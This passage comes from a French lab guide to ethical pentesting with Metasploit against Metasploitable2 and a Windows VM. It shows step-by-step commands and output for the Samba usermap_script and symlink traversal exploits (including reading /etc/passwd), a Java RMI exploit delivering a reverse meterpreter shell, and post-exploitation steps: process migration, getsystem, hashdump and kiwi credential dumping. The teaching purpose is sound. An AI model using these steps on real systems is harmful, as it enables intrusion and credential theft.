Samba est une implémentation SMB open source de MAD (Microsoft Active Directory) qui permet à des machines non Windows, comme les machines Unix, de communiquer avec un réseau Windows. Cela permet de faire paraitre une machine Unix comme une machine Windows, impliquant qu'une station Windows serait capable d'accéder à des répertoires et des fichiers sur la machine Unix de la même manière que si c'était une machine Windows. Cela permet de partager un disque ou une imprimante Unix avec des machines Windows, et vice versa, ainsi que d'autres interactions avec les deux types de systèmes d'exploitation.

8.1. Préparation :

Il suffit simplement de s'assurer que la machine cible, donc notre Metsaploitable2, ait le port 445 ouvert et qu'il fasse tourner le service *Samba smbd 3.0.20-Debian,* grâce à la commande *nmap -PA -A -sV -sT -T4 –version-all -v -p <port num> <IP address>.*

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Figure 24 : Nmap Samba

•	ouail@KALI-portable:~		۹ :	_	• ×
PORT STATE SERVICE 445/tcp open netbios-ssn MAC Address: B4:6B:FC:62:E Warning: OSScan results ma pen and 1 closed port Device type: general purpo Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux OS details: Linux 2.6.9 - Uptime guess: 497.100 days Network Distance: 1 hop	VERSION Samba smbd 3.0.20-Debian (w 2:5B (Intel Corporate) ay be unreliable because we ose c_kernel:2.6 2.6.33 5 (since Wed Apr 15 14:16:21	vorkgroup: could not 2020)	WORKGRO	UP) least	1 0
TCP Sequence Prediction: I IP ID Sequence Generation:	All zeros				

8.2. Payload cmd/unix/generic :

Par défaut, nous avons le payload *cmd/unix/reverse_netcat*. L'utilisation de ce dernier est semblable à celle du payload utilisé dans l'Exploit vsftpd 2.3.4, mais plutôt que d'avoir un Shell à distance, il nous permet d'exécuter une commande sur la machine cible en l'insérant dans l'option *CMD* du payload, par exemple *set CMD shutdown 0*, avant de lancer l'Exploit avec *exploit*. La machine cible va alors exécuter la commande sans l'afficher sur sa console (ce qui, en l'occurrence, l'éteindra).

Tout ce processus se passe sans créer de session, contrairement à ce que nous avions fait auparavant.

Figure	25 :	set	CMD	shutdown	0
--------	------	-----	-----	----------	---

msf6 exploit(multi/sam	ba/usermap_scri) >	set cmd	shutdown	0
cmd => shutdown 0					
<u>msf6</u> exploit(multi/sam	da/Usermap_scri	pt) >	exploit		
<pre>[*] Exploit completed,</pre>	but no session	was	created.		

9. Auxiliary admin/smb/samba_symlink_traversal :

Ce module exploite une faille de liaison de répertoires dans le serveur Samba CIFS. Ce dernier peut être configuré pour donner la possibilité à n'importe quel utilisateur avec le droit d'écriture, de créer des liens au *root filesystem*.

Les liens symboliques ou symlinks sont des fichiers qui sont liés à d'autres fichiers ou dossiers dans un système, c'est une mécanique cruciale pour le bon fonctionnement de

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

l'environnement Linux. Les systèmes de partage de fichiers comme Samba peuvent profiter de ces liens pour accorder un accès aux utilisateurs, mais seulement pour les dossiers/fichiers choisis. Cependant, Samba a également comme options par défaut les *wide links* qui sont des symlinks ayant le privilège d'accéder à d'autres fichiers que ceux qui ont été partagés. C'est de la que provient la faille, car n'importe quel utilisateur qui le droit d'écriture pourra créer un lien avec le dossier root. Il est donc nécessaire de spécifier un dossier « writeable » qui sera ensuite lié au root de la victime.

9.1. Préparation :

En premier, il faut lancer la commande *nmap -sV <IP de la cible>* pour s'assurer de la présence des services *netbios-ssn* version *Samba smbd 3.X – 4.X (workgroupe : WORKGROUP),* sur le port 445/tcp.

Il se peut que la machine Kali n'arrive pas à se connecter sur la machine cible avec le *smbclient* comme l'indique l'image suivante :

Figure 26 : erreur de connexion smbclient



Pour régler ce problème, il faut aller sur */etc/samba* dans la machine de l'attaquant, et modifier le fichier *smb.conf* dans la section [global] en rajoutant la ligne suivante :

Client min protocol = NT1.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

. ouail@KALI-portable: ~ Q _ 0 × -(ouail⊛KALI-portable)-[~] -\$ smbclient -L 192.168.1.29 Enter WORKGROUP\ouail's password: Anonymous login successful Sharename Туре Comment print\$ Disk **Printer Drivers** tmp Disk oh noes! Disk opt IPC\$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)) ADMIN\$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)) Reconnecting with SMB1 for workgroup listing. Anonymous login successful Server Comment Master Workgroup WORKGROUP LIVEBOX

Figure 27 : exécution de la commande smbclient

La réexécution de la commande devrait alors nous montrer un résultat similaire à celuilà, en utilisant une connexion anonyme (il suffit d'appuyer sur enter au moment où msf nous demande le password). Cette liste contient les partages accessibles par un utilisateur anonyme.

9.2. Attaque :

Figure 28 : Les paramètres du module samba_symlink_traversal



Le paramètre habituel *RHOSTS* indique la ou les machines cibles. Le paramètre *SMBSHARE* devrait indiquer un dossier partagé avec les utilisateurs anonymes, comme nous avons pu l'illustrer plus tôt : ce sera donc ici le dossier *tmp*. Le dernier paramètre indiquera le lien qui sera créé et lié avec le dossier root de la machine cible.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

<pre>msf6 auxiliary(addin/add/saddi_synlink travereal) > run [*] Running module against 192.168.1.29 [*] 192.168.1.29:445 - Connecting to the server [*] 192.168.1.29:445 - Trying to mount writeable share 'tmp' [*] 192.168.1.29:445 - Trying to link 'HackedBySpike' to the root filesystem [*] 192.168.1.29:445 - Now access the following share to browse the root filesystem: [*] 192.168.1.29:445 - \lapselow link_'HackedBySpike' [*] Auxiliary module execution completed msf6 auxiliary(admin/and/sambn_synlink_traversal) > smbclient //192.168.1.29/tmp [*] exec: smbclient //192.168.1.29/tmp Enter WORKGROUP/ouail's password: Anonymous login successful Try 'help' to get a list of possible commands. smb: \> ls</pre>		ouail@	KALI-port	able: ~	Q : _ = ×			
<pre>[*] 192.168.1.29:445 - Connecting to the server 192.168.1.29:445 - Trying to mount writeable share 'tmp' 192.168.1.29:445 - Trying to link 'HackedBySpike' to the root filesystem 192.168.1.29:445 - Now access the following share to browse the root filesystem: 192.168.1.29:445 - \\192.168.1.29\tmp\HackedBySpike\ 192.168.1.29:445 - \\192.168.1.29\tmp\HackedBySpike\ 192.168.1.29:455 - \\192.168.1.29\tmp\HackedBySpike\ 105.12.555 - \\192.12.555 - 2012 105.12.555 - 2012 105.14.552 - \\192.1555 - 2012 105.14.552 - \\192.1555 - 2012 105.14.552 - \\192.1555 - 2012 105.14.552 - \\192.1555 - 2012 105.14.552 - 2012 10</pre>	<u>msf6</u> auxiliary(<mark>admin/smb/samba_symlink_traversal</mark>) > run [*] Running module against 192.168.1.29							
<pre>[*] Auxiliary module execution completed msf6 auxiliary(admin/smh/smh/smhu_symlink_traversml) > smbclient //192.168.1.29/tmp [*] exec: smbclient //192.168.1.29/tmp Enter WORKGROUP\ouail's password: Anonymous login successful Try "help" to get a list of possible commands. smb: \> ls </pre>	 192.168.1.29:445 - Connecting to the server 192.168.1.29:445 - Trying to mount writeable share 'tmp' 192.168.1.29:445 - Trying to link 'HackedBySpike' to the root filesystem 192.168.1.29:445 - Now access the following share to browse the root filesystem: 192.168.1.29:445 - \\192.168.1.29\tmp\HackedBySpike\ 							
Enter WORKGROUP\ouail's password: Anonymous login successful Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Sep 1 01:08:03 2021 DR 0 Sun May 20 20:36:12 2012 HackedBySpike DR 0 Sun May 20 20:36:12 2012 .ICE-unix DH 0 Tue Aug 31 23:48:13 2021 5112.jsvc_up R 0 Tue Aug 31 23:48:15 2021 .X1-unix DH 0 Tue Aug 31 23:48:15 2021 .X0-lock HR 11 Tue Aug 31 23:48:15 2021 rootfs DR 0 Sun May 20 20:36:12 2012 .222168 blocks of size 1024. 5430692 blocks available smb: \> cd HackedBySpike\ smb: \> cd HackedBySpike\ smb: \AckedBySpike\> ls . DR 0 Sun May 20 20:36:12 2012 DR 0 Sun May 20 20:36:12 2012 initrd DR 0 Tue Mar 16 23:57:40 2010 media DR 0 Tue Mar 16 23:55:52 2010 bin DR 0 Mon May 14 05:35:33 2012 lost+found DR 0 Tue Mar 16 23:55:55 2010 mnt DR 0 Mon May 14 03:54:53 2012 initrd.img R 7929183 Mon May 14 05:35:6 2012	<pre>[*] Auxiliary module execution completed msf6 auxiliary(admin/smb/samba_symlink_traversal) > smbclient //192.168.1.29/tmp [*] exec: smbclient //192.168.1.29/tmp</pre>							
J D 0 Wed Sep 1 01:08:03 2021 DR 0 Sun May 20 20:36:12 2012 HackedBySpike DR 0 Sun May 20 20:36:12 2012 .TCE-unix DH 0 Tue Aug 31 23:48:13 2021 5112.jsvc_up R 0 Tue Aug 31 23:48:15 2021 .X11-unix DH 0 Tue Aug 31 23:48:15 2021 .X0-lock HR 11 Tue Aug 31 23:48:15 2021 .X0-lock BR 0 Sun May 20 20:36:12 2012 .X1 DR 0 Sun May 20 20:36:12<	Enter WORKGROUP\ouail's password: Anonymous login successful Try "help" to get a list of possib smb: \ls	le com	mands.					
. DR 0 Sun May 20 20:36:12 2012 HackedBySpike DR 0 Sun May 20 20:36:12 2012 .TCE-unix DH 0 Tue Aug 31 23:48:13 2021 5112.jsvc_up R 0 Tue Aug 31 23:48:15 2021 .X11-unix DH 0 Tue Aug 31 23:48:15 2021 .X0-lock HR 11 Tue Aug 31 23:48:15 2021 .X0-lock BR 0 Sun May 20 20:36:12 2012 .X0-lock DR 0 Sun May 20 20:36:12 2012 .X0-lock DR 0 Sun May 20 20:36:12 2012 DR 0 Sun May 20 20:	Sill D . (> CS	n	۵	Wed Sen 1 01.08.03	2021			
HackedBySpike DR O Sum May 20 20:36:12 2012 HackedBySpike DR 0 Sun May 20 20:36:12 2012 .ICE-unix DH 0 Tue Aug 31 23:48:13 2021 5112.jsvc_up R 0 Tue Aug 31 23:48:15 2021 .X11-unix DH 0 Tue Aug 31 23:48:15 2021 .X0-lock HR 11 Tue Aug 31 23:48:15 2021 .X0-lock BR 0 Sun May 20 20:36:12 2012 .X0 DR Sun May 20 20:36:12 2012 2012 DR Mar 16 23:57:40		np	ő	Sun May 20 20:36:12	2021			
.ICE-unix DH 0 Tue Aug 31 23:48:13 2021 5112.jsvc_up R 0 Tue Aug 31 23:48:15 2021 .X11-unix DH 0 Tue Aug 31 23:48:15 2021 .X0-lock HR 11 Tue Aug 31 23:48:15 2021 .X0-lock HR 11 Tue Aug 31 23:48:15 2021 rootfs DR 0 Sun May 20 20:36:12 2012 7282168 blocks of size 1024. 5430692 blocks available smb: \> cd HackedBySpike\ smb: \HackedBySpike\> ls . DR 0 Sun May 20 20:36:12 2012 . DR 0 Sun May 20 20:36:12 2012 DR 0 Tue Mar 16 23:55:52 2010 media DR </td <td> HackedBySnike</td> <td>DR</td> <td>0</td> <td>Sun May 20 20:36:12</td> <td>2012</td>	 HackedBySnike	DR	0	Sun May 20 20:36:12	2012			
5112.jsvc_up R 0 Tue Aug 31 23:48:26 2021 .X11-unix DH 0 Tue Aug 31 23:48:15 2021 .X0-lock HR 11 Tue Aug 31 23:48:15 2021 rootfs DR 0 Sun May 20 20:36:12 2012 7282168 blocks of size 1024. 5430692 blocks available smb: \> cd HackedBySpike\ smb: \HackedBySpike\> ls . DR 0 Sun May 20 20:36:12 2012 . DR 0 Tue Mar 16 23:55:52 2010 media DR 0 Mon May 14 <t< td=""><td>TCF-unix</td><td>БН</td><td>ő</td><td>Tue Aug 31 23:48:13</td><td>2012</td></t<>	TCF-unix	БН	ő	Tue Aug 31 23:48:13	2012			
.X11-unix DH 0 Tue Aug 31 23:48:15 2021 .X0-lock HR 11 Tue Aug 31 23:48:15 2021 rootfs DR 0 Sun May 20 20:36:12 2012 7282168 blocks of size 1024. 5430692 blocks available smb: \> cd HackedBySpike\ smb: \> cd HackedBySpike\> ls . DR 0 Sun May 20 20:36:12 2012 . DR 0 Sun May 20 20:36:12 2012 . DR 0 Sun May 20 20:36:12 2012 . DR 0 Sun May 20 20:36:12 2012 . DR 0 Sun May 20 20:36:12 2012 . DR 0 Sun May 20 20:36:12 2012 . DR 0 Tue Mar 16 23:57:40 2010 media DR 0 Tue Mar 16 23:55:15 2010 bin DR 0 Mon May 14 05:35:56 2010 sbin DR 0	5112, isvc up	R	õ	Tue Aug 31 23:48:26	2021			
.X0-lock HR 11 Tue Aug 31 23:48:15 2021 rootfs DR 0 Sun May 20 20:36:12 2012 7282168 blocks of size 1024. 5430692 blocks available smb: \> cd HackedBySpike\ smb: \> cd HackedBySpike\> ls . DR 0 Sun May 20 20:36:12 2012 . DR 0 Tue Mar 16 23:57:40 2010 media DR 0 Tue Mar 16 23:55:15 2010 bin DR 0 Mon May 14 05:35:56 2010 sbin DR 0 M	.X11-unix	DH	õ	Tue Aug 31 23:48:15	2021			
rootfs DR 0 Sun May 20 20:36:12 2012 7282168 blocks of size 1024. 5430692 blocks available smb: \> cd HackedBySpike\ smb: \> cd HackedBySpike\> ls . DR 0 Sun May 20 20:36:12 2012 initrd DR 0 Tue Mar 16 23:55:15 2010 bin DR 0 Mon May 14 03:55:15 2010 mnt DR 0 Mon May 14 03:55:6 2012 initrd.img R 7929183	.X0-lock	HR	11	Tue Aug 31 23:48:15	2021			
7282168 blocks of size 1024. 5430692 blocks available smb: \> cd HackedBySpike\> ls smb: \HackedBySpike\> ls . DR 0 Sun May 20 20:36:12 2012 DR 0 Sun May 20 20:36:12 2012 DR 0 Sun May 20 20:36:12 2012 DR 0 Sun May 20 20:36:12 2012 initrd DR 0 Tue Mar 16 23:57:40 2010 media DR 0 Tue Mar 16 23:55:52 2010 bin DR 0 Mon May 14 05:35:33 2012 lost+found DR 0 Tue Mar 16 23:55:15 2010 mnt DR 0 Wed Apr 28 22:16:56 2010 sbin DR 0 Mon May 14 03:54:53 2012 initrd.img R 7929183 Mon May 14 05:35:56 2012	rootfs	DR	0	Sun May 20 20:36:12	2012			
. DR 0 Sun May 20 20:36:12 2012 DR 0 Sun May 20 20:36:12 2012 initrd DR 0 Tue Mar 16 23:57:40 2010 media DR 0 Tue Mar 16 23:55:52 2010 bin DR 0 Mon May 14 05:35:33 2012 lost+found DR 0 Tue Mar 16 23:55:15 2010 mnt DR 0 Wed Apr 28 22:16:56 2010 sbin DR 0 Mon May 14 03:35:53 2012 initrd.img R 7929183 Mon May 14 03:35:56 2012	7282168 blocks of size 1024. 5430692 blocks available smb: \> cd HackedBySpike\ smb: \HackedBySpike\> ls							
DR 0 Sun May 20 20:36:12 2012 initrd DR 0 Tue Mar 16 23:57:40 2010 media DR 0 Tue Mar 16 23:55:52 2010 bin DR 0 Tue Mar 16 23:55:52 2010 bin DR 0 Mon May 14 05:35:33 2012 lost+found DR 0 Tue Mar 16 23:55:15 2010 mnt DR 0 Wed Apr 28 22:16:56 2010 sbin DR 0 Mon May 14 03:35:55 2012 initrd.img R 7929183 Mon May 14 05:35:56 2012		DR	Ø	Sun May 20 20:36:12	2012			
Intro DR 0 Tue Mar 16 23:57:40 2010 media DR 0 Tue Mar 16 23:55:52 2010 bin DR 0 Mon May 14 05:35:33 2012 lost+found DR 0 Tue Mar 16 23:55:15 2010 mnt DR 0 Wed Apr 28 22:16:56 2010 sbin DR 0 Mon May 14 03:54:53 2012 initrd.img R 7929183 Mon May 14 05:35:56 2012	11	DR	0	Sun May 20 20:36:12	2012			
Internation DR 0 Tue Mar 16 23:55:52 2010 bin DR 0 Mon May 14 05:35:33 2012 lost+found DR 0 Tue Mar 16 23:55:15 2010 mnt DR 0 Wed Apr 28 22:16:56 2010 sbin DR 0 Mon May 14 03:54:53 2012 initrd.img R 7929183 Mon May 14 05:35:56 2012	Initro	DR	0	Tue Mar 16 23:57:40	2010			
DR 0 Mon May 14 05:35:33 2012 lost+found DR 0 Tue Mar 16 23:55:15 2010 mnt DR 0 Wed Apr 28 22:16:56 2010 sbin DR 0 Mon May 14 03:54:53 2012 initrd.img R 7929183 Mon May 14 05:35:56 2012		DR	0	Tue Mar 16 23:55:52	2010			
DR 0 Tue Mar 16 23:55:15 2010 mnt DR 0 Wed Apr 28 22:16:56 2010 sbin DR 0 Mon May 14 03:54:53 2012 initrd.img R 7929183 Mon May 14 05:35:56 2012	Jost found	DR	0	Mon May 14 05:35:33	2012			
DR 0 Wed Apr 28 22:10:56 2010 sbin DR 0 Mon May 14 03:54:53 2012 initrd.img R 7929183 Mon May 14 05:35:56 2012	tost+round mat	DR	0	Tue Mar 10 23:55:15	2010			
SDIN DR 0 Mon May 14 03:54:53 2012 initrd.img R 7929183 Mon May 14 05:35:56 2012		DR	Ø	wed Apr 28 22:16:56	2010			
R /929183 Mon May 14 05:35:56 2012	SDIN initual ing	DR	7020102	Mon May 14 03:54:53	2012			
	homo	R	7929183	Mod Aug 25 17:37:10	2012			

Figure 29 : Exécution du module samba_symlink_traversal

Une fois avoir exécuté ce module avec *run,* il nous indique qu'une liaison a été établie entre le dossier qu'il a lui-même créé, *HackedBySpike* et le *root filesystem*. J'ai ensuite utilisé cette liaison avec la commande *smbclient //192.168.1.29/tmp* en indiquant le lien (tmp) que nous avons utilisé dans le paramètre *SMBSHARE* et auquel nous pouvons accéder comme un dossier normal, puis j'ai cliqué sur *ENTER* sous le password pour me loguer en Anonymous.

La première commande *ls* montre le dossier créé, on y accède avec *cd HackedBySpike*, puis la deuxième commande *ls* nous montre qu'on est dans un répertoire root de la victime. Pour confirmer cela, j'ai exécuté *more etc/passwd* pour afficher les mots de passe sauvegardés sur la machine, ce qui m'a retourné le résultat suivant.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Figure 30 : Récupération des mots de passe avec smb



Nous pouvons extraire ce fichier sur notre machine en exécutant get etc/passwd.

10. Exploit multi/misc/java_rmi_server :

Ce module profite de la configuration par défaut du Remot Method Invocation (RMI), qui permet de charger des classes à partir des URL distantes grâce au HTTP. Cette attaque ne fonctionnera pas avec les ports Java Management Extension (JMX), car ils ne prennent pas en charge le chargement des classes à distance.

Cet Exploit profite du même service que *exploit/multi/browser/java_rmi_connection_impl* qui exploite une vulnérabilité dans la JRE (Java Runtime Environment), trouvée dans la version 6 avant la mise à jour 19, et la version 5 avant la mise à jour 23. Cette faille permet de unmarshal⁷ un marshalobject qui contient un classloader personnalisé.

10.1. Préparation :

En scannant la machine cible, on s'aperçoit que le port 1099 est ouvert et fait tourner le service java-rmi. Nous allons donc chercher « java_rmi » dans Metasploit, ce qui nous affiche quatre résultats ; deux auxiliaires et deux exploits.

⁷ Cela signifie qu'un objet marshal, par exemple un XML, se fera convertir en JAVA Object.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Nous allons tout d'abord utiliser l'auxiliaire *auxiliary/scanner/misc/java_rmi_server* pour vérifier que la machine est bien exploitable à travers cette vulnérabilité.

	a so						
-				ouail@KALI-por	table: ~		Q : - □ ×
<u>mst6</u> post(1		network) >	search java_rm	1			
Matching Mo	dules =====						
# Name				Disclosure Date	Rank	Check	Description
0 auxil 1 explo	iary/gather/java_ it/multi/misc/jav	rmi_regist a_rmi_serv	ry er	2011-10-15	normal excellent	No Yes	Java RMI Registry Interfaces Enumeration Java RMI Server Insecure Default Configura
2 auxil	iary/scanner/misc	/java_rmi_	server	2011-10-15	normal	No	Java RMI Server Insecure Endpoint Code Exe
3 explo vilege Esca	uttion Stainer 3 exploit/multi/browser/java_rmi_connection_impl 2010-03-31 excellent No Java RMIConnectionImpl Deserialization Pri vilege Escalation						
Interact wi	th a module by na	me or inde	x. For example	info 3, use 3 or	use exploit	/multi/	browser/java_rmi_connection_impl
<u>msf6</u> post(1 <u>msf6</u> auxili	inux/gather/enum_ ary(scanner/misc/	network) > java_rmi_s	use 2 erver) > option	s			
Module opti	ons (auxiliary/sc	anner/misc	/java_rmi_serve	r):			
Name	Current Setting	Required	Description				
RHOSTS RPORT THREADS	RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file: <path>' RPORT 1099 yes The target port (TCP) THREADS 1 yes The number of concurrent threads (max one per host)</path>					ts file with syntax 'file: <path>' t)</path>	
<u>msf6</u> auxili RHOSTS => 1	<u>msf6</u> auxiliary(<mark>scanner/misc/java_rai_server</mark>) > set RHOSTS 172.20.10.9 RHOSTS => 172.20.10.9						
<u>mst6</u> auxili	<pre>msf6 auxiliary(scannek/misc/java_rmi_server) > run</pre>						
[+] 172.20. [*] 172.20. [*] Auxilia <u>msf6</u> auxilia	<pre>[+] 172.20.10.9:1099 - 172.20.10.9:1099 Java RMI Endpoint Detected: Class Loader Enabled [*] 172.20.10.9:1099 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/misc/jaw.rmi.server) ></pre>						

Figure 31 : Paramètres et exécution du scanner misc/java rmi server

La ligne avec le + vert indique « Java RMI Endpoint Detected », ce qui signifie que la machine fait bien tourner le service que l'on veut exploiter.

10.2. Payload java/meterpreter/reverse_tcp :

Pour commencer cette attaque, il faut *search* java_rmi et choisir l'Exploit expliqué auparavant. Puis, nous avons quelques paramètres à modifier. Le premier est le *uripath.* En lui donnant comme valeur « / », nous indiquons à la Java RMI l'emplacement distant de la classe à charger en faisant une requête HTTP. C'est pour cela qu'il faut aussi modifier le paramètre *srvport* à *80* pour être sûrs que la victime puisse exécuter la requête et donc sortir par ce port.

Pour finir, nous allons set payload java/meterpreter/reverse_tcp.

Show targets nous permettra de voir les systèmes sur lesquels nous pouvons exécuter cette attaque. Pour l'exercice, nous resterons sur *Generic (java Payload).*

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

	A ser	S.,	ouail@KALI-portable: ~	Q : _ = ×		
msf6 exploit(nit_servar)	> options			
Module option:	s (exploit/multi/	misc/java_	rmi_server):			
Name	Current Setting	Required	Description			
HTTPDELAY RHOSTS RPORT	100 172.20.10.9 1099	yes yes yes	Time that the HTTP Server will wait for the payload request The target host(s), range CIDR identifier, or hosts file with syntax The target port (TCP)	'file: <path>'</path>		
SRVHUST	80	yes	The local most or network interface to listen on. This must be an add achine or 0.0.0.0 to listen on all addresses. The local nort to listen on	ress on the local m		
SSL SSLCert	false	no no	Megotiate SSL for incoming connections Path to a custom SSL certificate (default is randomly generated)			
URIPATH		no	The URI to use for this exploit (default is random)			
Payload option	ns (java/meterpre	ter/revers	e_tcp):			
Name Cur:	rent Setting Req	uired Des	cription			
LHOST 172 LPORT 4444	.20.10.8 yes 4 yes	The The	: listen address (an interface may be specified) listen port			
Exploit targe						
Id Name						
Ø Generi	c (Java Payload)					
<u>msf6</u> exploit(nt server)	<pre>> exploit</pre>			
[*] Started reverse TCP handler on 172.20.10.8:4444 [172.20.10.9:1099 - Using URL: http://0.0.0.0:80/ [*] 172.20.10.9:1099 - Local IP: http://172.20.10.8:80/ [*] 172.20.10.9:1099 - Sending RMI Header [*] 172.20.10.9:1099 - Sending RMI Header [*] 172.20.10.9:1099 - Sending RMI Call [*] 172.20.10.9:1099 - Sending RMI Call						
meterpreter >						

Figure 32 : Configuration de l'exploit java rmi server

Nous avons donc une session Meterpreter ouverte que nous pouvons mettre en *background* pour utiliser des modules post-exploitation, par exemple.

11. Outils post-exploitation :

11.1. Windows/meterpreter/reverse_tcp :

C'est l'un des outils les plus puissants de Metasploit. Nous allons voir quelques fonctionnalités du Meterpreter, mais pas toutes, il faut d'abord avoir une session Meterpreter en marche pour avoir accès aux outils suivants.

11.1.1. Migrate :

Il est possible de changer le processus sur lequel le Meterpreter tourne en lançant la commande *ps* pour afficher tous les processus qui tournent sur la machine victime, puis *migrate <PID du processus souhaité>* de la liste affichée.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Figure 3	3:	Migrate	Meter	preter

neterp	reter	> getpid				
urren	t pid:	1144				
eterp	reter	> ps				
roces	s List					
	======					
PID	PPID	Name	Arch	Session	User	Path
	0	[System Process]				
(õ	System	x86	0	AUTORITE NT\SYSTEM	
32	728	sychost.exe	x86	ő	AUTORITE NT\SERVICE LOCAL	C:\WINDOWS\svstem32\svchost.exe
24	728	vmtoolsd.exe	x86	0	AUTORITE NT\SYSTEM	C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
536	4	smss.exe	x86	0	AUTORITE NT\SYSTEM	\SystemRoot\System32\smss.exe
504	536	csrss.exe	x86	0	AUTORITE NT\SYSTEM	<pre>\??\C:\WINDOWS\system32\csrss.exe</pre>
84	536	winlogon.exe	x86	0	AUTORITE NT\SYSTEM	<pre>\??\C:\WINDOWS\system32\winlogon.exe</pre>
28	684	services.exe	x86	0	AUTORITE NT\SYSTEM	C:\WINDOWS\system32\services.exe
740	684	lsass.exe	x86	0	AUTORITE NT\SYSTEM	C:\WINDOWS\system32\lsass.exe
908	1144	wscntfy.exe	x86	0	MES-0116F59708E\dfqs	C:\WINDOWS\system32\wscntfy.exe
916	728	vmacthlp.exe	x86	0	AUTORITE NT\SYSTEM	C:\Program Files\VMware\VMware Tools\vmacthlp.exe
932	728	svchost.exe	x86	0	AUTORITE NT\SYSTEM	C:\WINDOWS\system32\svchost.exe
1000	728	svchost.exe	x86	0	AUTORITE NT\SERVICE RÉSEAU	C:\WINDOWS\system32\svchost.exe
144	728	svchost.exe	x86	0	AUTORITE NT\SYSTEM	C:\WINDOWS\System32\svchost.exe
1204	1356	explorer.exe	x86	0	MES-0116F59708E\dfqs	C:\WINDOWS\Explorer.EXE
1252	728	svchost.exe	x86	0	AUTORITE NT\SERVICE RESEAU	C:\WINDOWS\system32\svchost.exe
1324	728	svchost.exe	x86	0	AUTORITE NT\SERVICE LOCAL	C:\WINDOWS\system32\svchost.exe
1380	1204	vmtoolsd.exe	X86	0	MES-0116F59708E\dtqs	C:\Program Files\VMware\VMware Tools\Vmtoolsd.exe
1532	/28	spoolsv.exe	X86	0	AUTORITE NT\SYSTEM	C:\WINDOWS\System32\Spoolsv.exe
1616	1204	rundli32.exe	X86	0		C:\WINDOWS\System32\rundll32.exe
1092	128	alg.exe	X80	0	AUTORITE NT SERVICE LUCAL	C:\WINDOWS\System32\atg.exe
1756	1204	mehta ava	200	0	MES 0116E50709E\dfac	C:\WINDOWS\Systems2\mebta_ava
.750	390	manca.exe	700	v	ME3-0110139708E (01d3	c. (windows (systemsz (msnita.exe
tern	reter	> migrate 1204				
1 Mi	gratin	g from 1144 to 120	14			
Mi	gratio	n completed succes	sfullv			
neterp [*] Mi [*] Mi	<u>reter</u> gratin gratio reter	> migrate 1204 g from 1144 to 120 n completed succes)4 Sfully	4		

11.1.2. Privilege escalation :

Suivant le processus sur lequel tournera la session du Meterpreter, nous serons bridés pour effectuer certaines actions. En effet, l'user ID peut être un utilisateur local et non administrateur. Pour augmenter notre champ d'actions possibles, il va falloir agir en tant qu'administrateur.

```
<u>meterpreter</u> > getuid
Server username: MES-0116F59708E\dfqs
<u>meterpreter</u> > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
<u>meterpreter</u> > getuid
Server username: AUTORITE NT\SYSTEM
```

Il s'agit ici de la méthode la plus simple et la plus connue, mais elle pourrait être obsolète sur les nouveaux systèmes, et peut donc être remplacée par d'autres modules postexploitation.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

11.1.3. Hashdump :

Cette méthode consiste à récupérer les hash des mots de passe enregistrés sur l'ordinateur. J'ai créé un compte administrateur « CompteTest » avec un mot de passe « Password » pour des raisons de clarté.

Figure 35 : ancien hashdump



À la dernière ligne, nous trouvons bien le nouveau compte créé avec un hash. Il existe plusieurs manières de convertir ce hash, dont *john the ripper*, mais évitons de compliquer le sujet. J'ai trouvé une manière plus simple pour extraire les mots de passe, et je la présente dans la section suivante intitulée « Kiwi ».

11.1.4. Kiwi :

Pour avoir accès à cette extension, il faut d'abord l'importer avec la commande *load kiwi* dans le Meterpreter.

Cet outil du Meterpreter est un remplacement pour l'ancienne extension « mimikatz ». Ces derniers ont pour but d'effectuer plusieurs types d'opérations sur les informations d'identification, comme le vidage de mot passe (« dumping password » en anglais), la création d'un « golden ticket » et d'autres commandes utiles pour les hackers.

Ici, nous allons utiliser la fonctionnalité de récupération de mots de passe.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Figure 36 : Commandes kiwi et récupération de mots de passe.

c	ommand	Descrip	tion
	 reds_all reds_kerbero reds_livessp reds_ssp reds_tspkg reds_wdigest csync csync_ntlm olden_ticket erberos_tick	Retriev Retriev Retriev Retriev Retriev Retriev Retriev Retriev create Create et_list List al et_purge Purge a	e all credentials (parsed) e Kerberos creds (parsed) e Live SSP creds e LM/NTLM creds (parsed) e SSP creds e TsPkg creds (parsed) e WDigest creds (parsed) e user account information via DCSync (unparsed) e user account NTLM hash, SID and RID via DCSync a golden kerberos ticket l kerberos tickets (unparsed) ny in-use kerberos tickets
k k l p w w	erberos_tick iwi_cmd sa_dump_sam sa_dump_secr assword_chan ifi_list ifi_list_sha	et_use Use a k Execute Dump LS ets Dump LS ge Change List wi red List sh	erberos ticket an arbitary mimikatz command (unparsed) A SAM (unparsed) A secrets (unparsed) the password/hash of a user fi profiles/creds for the current user ared wifi profiles/creds (requires SYSTEM)
terbe	preter > cre unning as SY etrieving ke ros credenti	ds_kerberos STEM rberos credential als ===	s
Jsern	ame	Domain	Password
null ompt NES-0 Ifqs nes-0) eTest 116F59708E\$ 116f59708e\$	(null) MES-0116F59708E WORKGROUP MES-0116F59708E WORKGROUP	(null) Passzord (null) KonoGiornoGiovanna (null)

Grâce à la commande *creds_kerberos* on a pu récupérer tous les comptes ainsi que leurs mots de passe sans hashage. Dans la colonne Password, les comptes qui ont /null) comme valeur, signifient qu'ils n'ont pas de mot de passe défini.

11.1.5. Incognito :

